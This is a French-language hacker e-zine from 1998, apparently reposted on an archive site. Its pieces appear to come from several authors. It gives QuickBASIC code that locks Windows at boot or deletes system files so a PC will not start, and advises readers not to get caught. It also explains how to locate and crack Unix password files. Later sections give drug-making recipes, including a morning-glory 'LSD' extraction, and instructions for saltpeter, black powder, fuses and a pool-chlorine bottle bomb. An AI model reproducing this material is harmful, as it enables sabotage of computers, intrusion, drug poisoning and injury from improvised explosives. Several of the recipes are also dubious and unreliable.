comme ca, a chaque fois que l'ordi va s'ouvrir, le programme va
s'activer avant que Windows load. Si le programme contien une loop,
l'ordi ne pourra plus s'ouvrir.. heehe..
Ou bien, à la place, après la ligne PROMPT $p$g, marquer
c:\autoexec.bat comme ca, le autoexec.bat va faire une loop, heehe!

Voici une source de mot de passe en Quickbasic :

1 CLS
REM Fait par endrix
PRINT "Stit, l'+cole sa SUCE!!! Entre le mot de passe :"
INPUT pass$
IF pass$ = "jackass" OR pass$ = "JACKASS" THEN
CLS
PRINT "Mmmm.. Bon mot de passe, windows va loader..."
SLEEP 3
ELSE
FOR w = 1 TO 300
FOR a = 1 TO 15
COLOR a
PRINT "Mauvais mot de passe";
NEXT a
NEXT w
GOTO 1
END IF

L'Utilisateur ne pourra pas entrer dans Windows s'il n'a pas le bon
mot de passe (qui est : jackass)

Voici un source de graphique qui affiche
"!!! YoUr CoMpUt3r 1s NoW FuCk3d Up !!!" d'une facon cool :

SCREEN 9
REM Code par endrix
BEEP
BEEP
DIM PI AS DOUBLE
PI = 4 * ATN(1)
text$ = "!!! YoUr CoMpUt3r 1s NoW FuCk3d Up !!!"
DIM TeXtMaTriX(LEN(text$) * 8, 16) AS INTEGER
PRINT text$
FOR y% = 1 TO 16
FOR i% = 1 TO (LEN(text$) * 8)
TeXtMaTriX(i%, y%) = POINT(i%, y%)
NEXT i%
NEXT y%
CLS
cc% = -LEN(text$) * 8
InC% = 8
XRaDiuS% = 50
DO
SCREEN 9, 0, 1, 0
CLS
IF cc% > 640 THEN cc% = -(LEN(text$) * 8)
cc% = cc% + InC%
FOR y% = 1 TO 16
FOR X% = cc% TO cc% + LEN(text$) * 8
X2% = (SIN((X% * (PI / 180))) * (XRaDiuS%)) + 270
LINE (X%, (X2% + y%) - 100)-(X%, (X2% + y%) - 100), TeXtMaTriX(X% - cc%, y%), BF
NEXT X%
NEXT y%
SCREEN 9, 0, 0, 0
PCOPY 1, 0
LOOP



3 - Vous pouvez juste faire un tit programme qui a comme fonction kill :

REM code par endrix
CLS
KILL "c:\autoexec.bat"
KILL "c:\windows\system\*.vxd
KILL "
c:\windows\*.vxd
KILL "c:\windows\win.com
PRINT "
Loading..."
SLEEP 2

ceci supprime les fichier VXD dans system et dans windows, win.com et
l'autoexec.bat. Ce ordinateur ne s'ouvrira plus !!!




Conclusion : Je suis sur que vous pourez penser a d'autre solution et je vous
souhaite de ne pas vous faire prendre en faisant ca, oky?!


==============================================================================
==============================================================================
==============================================================================

- endrix


===========================================================================
==============================par endrix===================================
_____ _ _ _ ____ _
| ___(_) ___| |__ (_) ___ _ __| _ \__ _| |
| |_ | |/ __| '_ \| |/ _ \ '__| |_) \ \ /\ / / |
| _| | | (__| | | | | __/ | | __/ \ V V /| |
|_| |_|\___|_| |_|_|\___|_| |_| \_/\_/ |_|

===========================================================================
===========================================================================

O============O
<|Introduction|>
O============O


Bien bonjour, hey oui, j'ai encore écrit un ti-quelque chose pour vous. Ce
texte a comme fonction de plus vous renseignez sur les fichiers pwl(password)
Vous montrez ou sont place ces fichiers sur les ftps, comment les decoders..
Ceci sera tres utile si vous voullez commencer a faire du ptit piratage. Du
PTIT j'ai bien dit. Ceci poura ainsi vous montrez, si vous avez un ftp, de
pouvoir vous protegez contre les attaques de lame qui n'ont rien a faire
dans la vie que "
hacker" des ftp's de Warez et faire un tit deltree /y....

Pour me rejoindre, je suis sur irc(Undernet) sur les channels suivants :
#outaouais, #warezfrancais, #pirate, #n0past. Si je suis pas sur une de ces
places la, cherchez moi pas :)) Euhhmmm.. mon email est le suivant :
lordendrix@hotmail.com et sur ce site web : http://www.haqch.espace2001.com
Se serait tres grandement aprecier quelques commentaires.... Ok, now lets
rock AND rooolllll !!!!


O=====================O
<|Les fichiers password|>
O=====================O


Pour le monde qui debuttent : les fichiers passwords contiennent le mot-de
passe mais de maniere crypter. Comme ca l'utilisateur peut pas obtenir le
mot-de-passe amoins qu'il le decrypte de maniere a obtenir un access puissant
qu'un appelle un "
super user account".


Voici un exemple de fichier password :
chare:u7mHuh5R4Umvo:105:100:Chris Hare:/u/chare:/bin/ksh
username:encrypted password:UID:GID:comment:home directory:login shell

Voici une table qui expliquera tout ces signes.....



le fichier ect/passdw
======================================================================
Nom Description Valeur
======================================================================
username Cette place, est pour chare
entrer le nom d'uti- rceh
lisateur du systeme. brb
il y en a un pour markd
chaque personne qui
se connecte au
serveur.
----------------------------------------------------------------------
encrypted password Cette espace contien u7mHuh5R4Umvo
le mot-de-passe en- x
crypter. Il y en *
a u pour chaque
personne qui se con- NOLOGIN
necte au serveur.
----------------------------------------------------------------------
UID Cette espace contien 0-60,000
l'ordre numérique
de la presentation
du systeme.
----------------------------------------------------------------------
GID Cette espace est re- 0-60,000
serve a la represen-
tation de l'entre ou
l'utilisateur devrai
etre.
----------------------------------------------------------------------
comment Ca, sa contien l'in- Chris Hare
formation sur l'uti- Ops manager, x273
lisateur. Information
personnelle.... # de
tel, addresse.....
----------------------------------------------------------------------
home directory Cet espace est l'info- /u/share
rmation, a l'entre de /usr/lib/ppp/ppp-
l'utilisateur quel de- users
vrait etre sont reper-
toire d'arrive.
----------------------------------------------------------------------
login shell C'est l'entre qui est /bin/sh
parti a l'entre de l'u- /bin/csh
tisitateur pour qu'il /bin/ksh
puisse bien entrer. Ca /bin/tcsh
peut varier selon les /usr/lib/uucp/uucio
droits de l'utilisateur. /usr/lib/ppp/ppd
----------------------------------------------------------------------


Ce n'est pas absolument cette ligne qu'il y aura dans le mot de passe
encrypter. Mais ce sera probablement semblable.
Voici quelque dir pout trouver les informations pour hacker un serveur:

/etc/passwd Le fichier password
/tcb/auth/files Le fichier proteger de la database
/etc/auth/systems/ttys Le terminal de control de la database
/etc/auth/subsystems Le subsystems proteger
/etc/auth/system/default Le system de database


Bon...... Maintenant que vous savez comment prendre un fichier password,
quoi faire avec ???? euhhmm.. c'est une bonne question... Pourquoi pas le
cracker ??? hein ?? C'est une bone idee je pense. Pour le faire, il vous
faudra des programmes. J'ai ici une petite source de Qbasic(sa viens avec
windows les mecs...c:\windows\qbasic.exe) Qui vous permettera de cracker
des simples mot-de-passe encrypter.

CLS
PRINT "
-------------------------------------------------------------------"
PRINT "
Ce programme a ete fait par endrix. "
PRINT "
Il a comme fonction de cracker les password code des ftp. "
PRINT "
Pour des commentaires,http://www.haqch.espace2001.com "
PRINT "
lordendrix@hotmail.com "
PRINT "
-------------------------------------------------------------------"
INPUT "
Mot-de-passe encrypter :"; I$
FOR X = 1 TO 255
FOR Y = 1 TO LEN(I$)
Y$ = MID$(I$, Y, 1)
YA = ASC(Y$)
n = X XOR YA
IF n = 32 THEN F = 1
n$ = n$ + CHR$(n)
NEXT Y
IF F THEN PRINT "
Mot-de-passe possible :"; n$
PRINT I$; "
'encrypter' a "; n$:
n$ = "": F = 0
NEXT X
PRINT "
Finitosss!"


Pour d'autre programme ou plus de renseignement sur les fichiers passwords,
allez voir ces sites web :

http://www.warforge.com
http://www.rootshell.com
http://endrix.cjb.net
http://www.antionline.com


O==========O
<|Conclusion|>
O==========O


Bon... J'espere que vous avez aimer ca les dudes et les dudettes !!! Ne faites
sourtout pas de connerie avec ca la..... :)))) Adios et venez voir le supperbe
site : Http://www.haqch.espace2001.com

===========================================================================
===========================================================================

- endrix





COMMENT CR++...DE LA MESA SAPIENTUM BANADINE -- PiXl
inspiré de Coaxial Karma (NPC #1)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Avertissement: On es aucunement responsable des effets causés par
la drogue qui suit.

La mesa sapientum banadine (nous l'appellerons banadine), comme sont
nom
l'indique, est faite a base de bananes. Les effets sont a peu-près les mêmes
que pour la marijuana sauf que la quantitée fumée doit être de 3 a 4 fois
supérieur et qu'elle provoque des étouffement (des: KeHeu! Keheu!...) lors
de l'absorbtion oral.

Le principal avantage de la banadine est qu'elle est légal. Selon moi, elle
ne vaut pas un bon join acheté a un pusher de confiance. Mais ça, c'est a
vous de le juger.

Voici donc comment la préparer:

1- Prendre environ 1 kilogramme de pelure de banane

2- Avec un couteau, peler l'intérieur de la banane.

3- Mettre les restants de l'intérieur de la pelure dans un chaudron et,
y ajoutez de l'eau. Faites bouillir de trois (3) à quatre (4) heures.
Le mélange devrait alors être pateux.

4- Etendre la pƒte sur un plateau à pizza, et cuire environ vingt (20) à
trente (30) minutes au four. Le produit qui en résultera devrait alors
être une poudre noire.

5- Finalement, fûmez-la jusqu'a l'obtention du "
high" désiré...;-)


'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-




COMMENT CRéé...(un dérivé du) LSD-25 -- PiXl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bon, les kids (je suis mal placé pour parlé....mais bon!), je dois vous
avertir que le LSD n'est pas très bon pour la santé et que c'est mal d'en
prendre...blablabla...Bon, vous êtes maintenant averti(e)s...Passons au
choses sérieuses:
Comment en fabriquer dans votre cuisine!..

Dans le temps (2 ou 3 ans), le LSD était très populaire dans les party rave.
A ce que l'on m'a dit, maintenant c'est plutôt l'exctasy. Je ne sais pas,
puisque je ne me tiens pas énormément dans les raves...
Plusieurs de mes chums (amis...) m'ont affirmé qu'il aimait mieux (et de loin
prendre du LSD dans les party puisque: les yeux ne viennent pas rouge, ça
ce consomme vite et sans odeur (pas de troubles) et la décente d'acide ce
fait mieux avec des chums que tout seul...

Quoi que vous fassiez de cette recette...Un bon conseil, n'abusez-pas!
Prendre 150 grammes de graines de "
Gloire du matin"
Dans 130 cc. d'éther de pétrole, laissez tremper pour 2 jours.
Filtrer la solution devant un écran filtre.
Jetez le liquide et laisser les graines sècher.
Pour 2 jours, laissez tremper dans 110 cc. d'alcool de bois.
Filtrez encore, gardez le liquide et appelez-le "
1."
Laissez encore trempez les graines dans 110 cc. d'alcool de bois pour 2
jours.
Filtrez et jetez les graines (garder le liquide!)
Ajoutez ce liquide dans le liquide appelé "
1."
Laissez le liquide sur un plaque a biscuits et laissez évaporer.
Quand tout le liquide sera évaporé, il ne vous restera qu'une sorte de
gomme jaune. Récupérez-la et placez-la dans de petite capsule.
30 grammes de "
Gloire du matin" = 1 trip

Il est important de mentionner que certaines compagnies ont enduit leurs
graines de "
Gloire du matin" avec des produits chimiques qui peuvent être
poison.
Ainsi, une bonne chose serait de vérifier auprès de vos fournisseurs!..
+tant donné que vous fabriquez vous-même votre LSD, il est
EXTREMEMENT important de calculer la quantité de LSD que
vous allez absorber ou vendre.
En général, 500 a 700 mics. serait une quantité idéale puisque qu'elle est
équivalente a un trip d'environ 8 heures. Si vous devez dépasser cette
quantité, non seulement vous gaspillez, mais vous risquer d'entraîner des
dommages très sérieux à votre cerveau ou même de mourir.
N'oubliez-pas que le LSD est la substance connue pour être la plus active
sur l'être humain (ce qui signifie que, une toute petite quantité peut fournir un
trip très élevé...).

-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-






LE SAVIEZ-VOUS?.. -- PiXl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vous trouver pas qu'un titre comme "
Le saviez-vous?..." fait quelques peu
Grand magazine. Moi, je trouves ça. Ya peut-être le fait que je viens de me
passer 2 gros bat en ligne (penser pas croche la! remplacez passer par
fumer).
Ce qui m'amène à vous parler d'une petite drogue relaxe qui a bon goût. Il
s' agit bien sûr de ce qu'on appelle évidement "
la peanuts" (je suis pas sur
de l' ortographe).
Hé oui!..Cette bonne vieille arachide est une petite drogue très légère. En
fait, ce n'est pas l'arachide comme telle, qui est une drogue, mais bien la
petite pelure brune autour d'elle.
Ca peut paraître surprenant, mais si vous prenez cette "
pelure" et que vous
vous roulez un beau petit joint avec, vous allez partir (au sens figurer
bien-sûr!..ha!..ces jeunes, faut tout leur expliquer!).
Personnellement, j'aime bien me prendre un petit joint de peanuts de temps
à autres...(mais c'est toff à allumer!...argh!...). Mais je vous conseille de
rajouter un peu de weed...Vous savez, la peanuts peut faire un très bon
complément pour ceux qui rajoute du tabac dans leur joint de weed (vous
êtes mieux de le prendre pure, mais si vous voulez absolument le mélanger a
quelques chose, voila une solution!)
Ne vous faites pas d'illusion, la peanuts ne vous emmènera jamais plus loin
que le monde de JIM MORRISON, et même la...En effet, il faut en
prendre énormément pour avoir un bon high. Le seul avantage de la
peanuts, selon moi, c'est qu'elle est pratiquement gratuite (au prix que ça
coûte...).

Rappelez-vous: "
Fumer de la peanuts, c'est écologique!"

-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-.,__,.-+'""'+-



LE CANNA PUNCH -- Tod
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ingrédients :
1 litre de rhum blanc agricole
1 gousse de vanille
1 racine de gingembre
100 g d'herbe
50 g de sucre roux

Laisser macérer 100 g d'herbe séchée dans un demi litre de Rhum blanc
pendant une semaine. Agiter plusieurs fois par jour en veillant à ce que
l'alcool recouvre totalement l'herbe.
Au bout d'une semaine essorer l'herbe et placer le liquide obtenu dans une
bouteille.
Mettez à nouveau a macérer l'herbe dans le deuxième demi litre de Rhum
blanc pendant une semaine.

Faites blanchir des fines tranches de gingembre avec la gousse de vanille
fendue ou coupée en morceaux, à feu très doux, et avec une noisette de
beurre et un peu d'eau; puis ajouter le sucre roux et tourner continuellement
jusqu'à ce que le sucre fonde.
Verser le contenu de la dernière macération avec l'herbe et à feu moyen
amener jusqu'au bouillonnement.
Essorer le tout encore chaud et rajouter au premier liquide.
Laisser décanter au moins quinze jours.

Un ou deux CANNA PUNCH à jeun feront de l'effet au bout d'un quart
d'heure environ.

-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-.,__,.-+'~~'+-

_Franck

COMMENT FAIRE DU NITRATE DE POTASSIUM?

Le nitrate de potassium est un oxydant des plus utilisé dans la fabrication des explosifs lents comme la traditionnelle poudre noire ou poudre a canon,bombe fumigene et d'autres mélanges
explosifs ou oxydants.Le nitrate de potassium est disponible a la pharmacie sous le nom de salpetre et qui coute environ entre 3.00$ a 6.00$ pour 100 grammes.Donc il est bon de la fabriquer soit-meme avec le procédé suivant.Mais il faut se procurer quelques éléments qu'on ne peut acheter mais qu'on produit soit-meme.


MATÉRIAUX:

-1 CONTENANT DE 5 GALLONS (20 LITRES)
-2 MORCEAUX DE TISSU TRES FIN
-2 GALLONS D'EAU (8 LITRES)
-CENDRE DE BOIS BIEN TAMISÉ
-2 GALLONS DE COMPOST FAIT A PARTIR DE VÉGÉTAUX BIEN DÉCOMPOSÉS


PROCÉDURES:

-Prendre le contenant,percer un trou de 1 cm de diametre,déposer un des morceaux de tissu dans le fond du contenant.Ajouter 1 cm d'épais de cendre de bois dessus le morceau de tissu
,mettre l'autre morceau de tissu par dessus.
-Mettre les 2 gallons de compost par-dessus le morceau de tissu.
-Verser 2 gallons d'eau bouillante sur le compost et récupérer la solution qui d'egoute,prendre cette solution et la filtrer.
-Verser la solution dans un contenant pour le faire bouillier,pendant 2 heures.Des petits grains de sel devraient apparaitre,enlevez les quand vous les voyez.
-Quand la solution a perdu la moitié de son volume original,enlevez la du feu.Laissez la reposer pendant 30 minutes.
-Filtrer ensuite la solution.Les petits crystaux restants sont du nitrate de potassium.


IMPORTANT:Le compost doit etre bien décomposé et il se peut que la solution dégage des odeurs.


___________________________________________________________________________

_Franck
Comment fabriquer de la poudre noir(poudre a canon)?

MATÉRIAUX:

-Nitrate de potassium (en grains) 750 ml
-Charbon de bois (en grains) 500 ml
-Soufre (en grains) 125 ml
-Alcool a friction 2500 ml
-Eau 750 ml
-Source de chaleur (rond de poil)
-2 seaux de 7500 ml tres résistant (ex:métal,céramique)


PROCÉDURE:

-Place l'alcool dans un seau.
-Place le nitrate de potassium,le charbon de bois et le soufre dans l'autre seau.
Additionne 250 ml d'eau,et agite la solution jusqu'a ce que les ingrédients soient dissous.
-Additionne 500 ml d'eau,et place le seau sur une source de chaleur.Faire chauffer jusqu'a temps qu'il est de petite bulles.

ATTENTION:NE PAS METTRE LA MIXTURE A ÉBUILLITION,SOIT SUR QU'IL RESTE DE L'EAU.

-Enleve la mixture de la source de chaleur et verse la dans l'alcool.Laisse la mixture dans l'alcool pendant 5 minutes.
-Enlever le liquide de la mixture et laisser secher.
___________________________________________________________________________

_Franck

Fabriquation d'une bombe avec du chlore de piscine.


MATÉRIAUX:

-Bouteille de liqueur 2 litres
-300 ml de chlore de piscine en poudre
-300 ml de lave-vitre pour auto.


PROCÉDURE:

Verser le lave-vitre dans la bouteille.Plier la bouteille en trois de facon a former un cone dans la partie du haut.Verser le chlore dans le cone.Fermer la bouteille avec le bouchon,agitez pour que les 2 solutions entre en contact et lancer immédiatement.La déflagration est d'environ 30 metres carré.

ATTENTION:IL NE FAUT PAS QUE LES 2 SOLUTIONS ENTRE EN CONTACT AVANT DE FERMER LE BOUCHON.SI VOUS VOYEZ QUE LE FOND DE LA BOUTEILLE DEVIENT CHAUD,LANCER IMMÉDIATEMENT.

__________________________________________________________________________

_Franck
Désignations courantes.

NOM CHIMIQUE NOM HABITUEL

-Acide acétique Vinaigre a 5%
-Acide chlorhydrique Acide chlorhydrique (batterie d'auto)
-Alum Sulfate d'aluminium
-Bicarbonate de sodium Petite vache
-Chlorure de sodium Sel de table
-Graphite Mine de crayon
-Hydroxyde d'ammonium Windex a 20%
-Hypochlorite de sodium Eau de javel
-Naphtaline Boules a mites
-Nitrate de potassium Salpetre
-Sulfate de calcium Platre
-Sulfate de magnésium Sel epsom
-Tétraborate de sodium Borax
-Zing,métal Zing (pile de batterie)

____________________________________________________________________________

_Franck

Comment faire des meches qui brulent 2 pouces a la minute?

MATERIAUX:

-3 lacets de cotton
-Nitrate de potassium ou chlorate de potassium
-Sucre
-eau chaude

PROCÉDURE:

Mixer 1 partie de nitrate de potassium ou de chlorate de potassium avec 1 partie de sucre et ensuite avec 2 parties d'eau chaude.Tremper chaques lacets dans la solution,et faire une tresse avec les lacets.


__________________________________________________________________________
_Franck

Comment faire des meches qui brulent 40 pouces par minute?

MATÉRIAUX:

-Poudre a canon
-3 lacets en cotton
-Farine
-Eau chaude

PROCÉDURE:

Mixer 1 partie de farine avec une partie de poudre a canon.Ensuite mixer ce melange avec 2 parties d'eau chaude.tremper les lacets dans cette solution et faire une tresse avec.


________________________________________________________________________
_Franck


Comment faire des feux de différentes couleurs?(feux de bengale)

COULEUR DU FEU INGRÉDIENTS NOMBRE DE PARTIE

-FEU BLEU: Chlorate de potassium 8
Sulfure de cuivre 2
Soufre 4
Chlorure mercureux 2
Oxyde de cuivre 1
Charbon de bois 1

-FEU VERT : Nitrate de baryum 12
Chlorate de potassium 3
Soufre 2


-FEU BLANC: Nitrate de potassium 7

  
Sulfure d'antimoine 1
Soufre 1


-FEU ROUGE: Nitrate de strontium 4
Chlorate de potassium 4
Charbon de bois 2
Soufre 1


-FEU JAUNE: Chlorate de potassium 6
Oxalate de sodium 2
Charbon de bois 2
Soufre 1


FEU POUDRE: Sulfate de cuivre 1
Soufre 1
Chlorate de potassium 1

Bien melanger,et alumer.



____________________________________________________________________________
@HAQCH dec 98 tout droits réservées

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT